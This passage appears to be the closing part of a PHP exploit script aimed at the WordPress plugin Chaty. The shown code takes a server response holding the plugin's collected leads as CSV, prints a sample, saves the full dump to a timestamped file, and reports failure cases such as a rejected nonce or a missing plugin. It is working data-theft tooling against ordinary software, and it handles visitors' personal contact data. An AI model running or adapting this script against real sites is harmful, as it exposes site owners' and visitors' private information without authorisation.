    $sample = substr($response, 0, 1000);
    echo "=== CSV SAMPLE ===n";
    echo $sample;
    if (strlen($response) > 1000) {
        echo "n... (truncated)";
    }
    echo "n==================n";
    
    // Optionally save to file
    $filename = "chaty_leads_" . time() . ".csv";
    file_put_contents($filename, $response);
    echo "[+] Full data saved to: $filenamen";
} else if ($http_code === 403) {
    echo "[-] FAILED: Access denied (HTTP 403). Nonce may be invalid or capability checks present.n";
} else if ($http_code === 500) {
    echo "[-] FAILED: Server error (HTTP 500). Target may not have Chaty installed or file generation failed.n";
} else {
    echo "[-] FAILED: Unexpected response. HTTP Code: $http_coden";
    echo "[-] Content-Type: $content_typen";
    echo "[-] Response preview: " . substr($response, 0, 500) . "n";
}

?>